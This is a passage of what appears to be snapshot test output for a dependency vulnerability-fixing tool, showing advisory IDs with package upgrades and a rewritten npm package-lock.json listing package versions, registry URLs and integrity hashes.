"id": "GHSA-v6h2-p8h4-qcjw", "packages": [ { "name": "brace-expansion", "version": "1.1.11" } ] } ] }, { "packageUpdates": [ { "name": "concat-stream", "versionFrom": "1.5.0", "versionTo": "1.6.1", "transitive": true } ], "fixed": [ { "id": "GHSA-g74r-ffvr-5q9f", "packages": [ { "name": "concat-stream", "version": "1.5.0" } ] } ] }, { "packageUpdates": [ { "name": "hosted-git-info", "versionFrom": "2.1.4", "versionTo": "2.8.9", "transitive": true } ], "fixed": [ { "id": "GHSA-43f8-2h32-f4cj", "packages": [ { "name": "hosted-git-info", "version": "2.1.4" } ] } ] } ] } --- [TestCommand/fix_non-interactive_json_in-place_package-lock.json - 2] Scanning /package-lock.json... Rewriting /package-lock.json... --- [TestCommand/fix_non-interactive_json_in-place_package-lock.json - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, "node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "dependencies": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.6.1", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, "engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." }, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": 